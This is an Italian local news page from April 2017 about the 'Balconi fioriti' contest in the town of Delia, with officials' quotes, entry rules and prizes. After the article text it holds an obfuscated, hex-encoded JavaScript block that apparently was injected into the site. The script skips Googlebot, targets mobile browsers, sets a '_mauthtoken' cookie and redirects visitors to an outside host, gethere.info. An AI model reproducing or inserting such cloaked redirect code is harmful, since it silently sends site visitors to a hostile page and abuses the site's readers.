Attualità

A Delia ‘balconi fioriti’

A Delia ‘balconi fioriti’

Gela – A Gela era stata proposta ma non ha avuto seguito. A Delia città floreale e multicolore, al via la prima edizione di “Balconi Fioriti”, l’iniziativa lanciata dall’amministrazione comunale per migliorare in modo naturale e semplice il paese attraverso il decoro floreale di balconi, davanzali e terrazzi.

<<Balconi fioriti – ha commentato il sindaco Gianfilippo Bancheri – è un progetto in fase di svolgimento a Caltanissetta, nata su iniziativa dell’avvocato Alfonso Gucciardo, alla quale abbiamo aderito condividendone lo spirito e la finalità. Crediamo così di promuovere e rafforzare la sensibilità e la cultura ambientale e allo stesso tempo valorizzare il centro urbano. Pensiamo che l’iniziativa possa non solo migliorare il decoro e la qualità della vita ma svolgere al tempo stesso una funzione educativa attraverso il contributo delle famiglie e il coinvolgimento di tutta la cittadinanza>>.

Soddisfazione per l’iniziativa portata avanti a Delia è stata espressa dall’avvocato Alfonso Gucciardo. <<Delia – ha detto – grazie all’interessamento del sindaco Gianfilippo Bancheri – è uno dei due comuni della provincia, insieme a Caltanissetta, ad avere aderito e portato avanti il progetto “Balconi fioriti”. Caltanissetta l’iniziativa è stata accolta molto positivamente dai cittadini e dalle scuole ed ha fatto registrare una partecipazione numerosa. Il nostro auspicio – ha aggiunto – è che anche gli altri comuni aderiscano presto all’iniziativa, il cui scopo è quello di promuovere la cultura del verde e svolgere il ruolo di sensibilizzazione nei confronti dell’ambiente, stimolando i cittadini ad arredare, utilizzando fiori e piante come elementi di decoro, i propri balconi, finestre, davanzali e terrazze>>.

<<Il nostro obiettivo – ha detto da parte sua l’assessora alla Cultura Piera Alaimo – è principalmente quello di valorizzare il verde e il patrimonio ambientale esistente attraverso la realizzazione di allestimenti floreali e l’istituzione di un concorso gratuito, aperto a tutti i cittadini, che si propone di premiare i migliori balconi o davanzali arredati con fiori. L’iniziativa vuole essere anche un elemento importante di sviluppo e di promozione turistica del nostro paese.>>.

Per realizzare l’iniziativa l’amministrazione comunale donerà ad ogni partecipante un contenitore con pianta di geranio pendente, <<che rappresenta – aggiunge l’assessora Alaimo – il decoro floreale ed è donata come stimolo verso la cultura del bello>>.

La partecipazione al concorso è gratuita e aperta a tutti i residenti e proprietari di immobili nel centro urbano di Delia. Il regolamento del concorso prevede che i concorrenti adotteranno la pianta e ne avranno cura, impegnandosi ad incrementare con altre fioriere e nuove fioriture i loro balconi.

Gli aspiranti partecipanti, potranno ritirare il modulo di iscrizione, allegato al Bando, presso la biblioteca comunale “Luigi Russo” in via Petilia o scaricarlo dal sito del comune di Delia www.comune.delia.cl.it. Il modulo dovrà essere riempito, protocollato e consegnato entro e non oltre il 15 maggio 2017.

Ogni concorrente, dovrà fotografare il proprio allestimento e fare pervenire la foto, entro e non oltre il 30 Giugno 2017, indicando il nominativo del titolare partecipante, l’indirizzo del balcone fiorito e l’oggetto, alla Commissione giudicatrice “Balconi Fioriti” presso la seguente pec del Comune di Delia: protocollo.delia@pec.it

Complessivamente sono 11 i premi del concorso. Al primo posto andrà un buono omaggio di euro 50. Due buoni di 25 euro vanno al secondo posto. I restanti 8 buoni di 15 euro invece andranno ai terzi classificati.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Stampa articolo
Visualizzazioni articolo: 8
Attualità

di più in Attualità

Il dragaggio non arriva? Torneo di beach volley al Porto di Gela

Rosa Battaglia27 aprile 2017

Note stonate: l’orchestra cerca casa

Liliana Blanco27 aprile 2017

Vigili urbani fra polvere e spazzatura

Redazione27 aprile 2017

L’ortopedico Antonio Catanese lascia l’Ospedale di Licata

Redazione27 aprile 2017

Operatori del porto inferociti: “basta, non si passa!”

Liliana Blanco27 aprile 2017

Palazzo di Giustizia: l’ingiustizia su Romano, la difesa di Confesercenti

Redazione27 aprile 2017

Quindici giorni senz’acqua

Redazione27 aprile 2017

Incarichi di progettazione. Pubblicato l’avviso per l’ elenco di professionisti

Redazione27 aprile 2017

Scuola di Comunicazione

Redazione26 aprile 2017

Una ventata di freschezza nel panorama giornalistico locale. Una nuova avventura “web-based” voluta, creata e condotta da un team giovane e competente. Una piazza virtuale per tutti i gelesi sparsi nel mondo e non solo. Questo e molto altro nel nuovo web-magazine che racconterà Gela e il circondario attraverso notizie in tempo reale, approfondimenti e una particolare attenzione alle storie, ai personaggi e agli eventi.

iscritto al n.3/2010 del registro di stampa in data 28/05/2010 del tribunale di Gela
Direttore Responsabile: Rosa Laura Battaglia - Editore: Pubblivision P.IVA: 01991870856